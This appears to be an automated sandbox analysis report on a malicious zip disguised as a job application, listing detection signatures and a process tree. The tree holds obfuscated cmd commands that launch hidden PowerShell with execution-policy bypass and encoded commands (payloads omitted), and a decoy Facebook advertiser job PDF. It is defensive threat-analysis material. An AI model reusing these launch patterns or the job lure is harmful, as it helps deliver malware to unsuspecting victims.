Windows
Analysis Report
JD & Application Form_A (910).zip
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for dropped file
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64_ra
- rundll32.exe (PID: 6388 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- cmd.exe (PID: 6724 cmdline: "C:\Windows\system32\cmd.exe" /v /k "STa^R^T /M^i^n "" po^We^r^sH^E^Ll -No^L^o^GO -No^p -e^p b^y^pA^sS -en^c^odEdc^O^M^MA^nd "[base64 payload omitted]"" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7028 cmdline: poWersHELl -NoLoGO -Nop -ep bypAsS -encodEdcOMMAnd "[base64 payload omitted]" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 payload omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- csc.exe (PID: 6928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\23vlt4we.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
- cvtres.exe (PID: 5944 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES250C.tmp" "c:\Users\user\AppData\Local\Temp\CSC881181D26AD458BA4326BF7DFDA6F5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
- powershell.exe (PID: 5736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Acrobat.exe (PID: 640 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\Facebook_Advertiser_Position_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 3572 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 4112 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1784 --field-trial-handle=1620,i,1014161114905579021,11906147473777142190,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- cmd.exe (PID: 1820 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand [base64 payload omitted]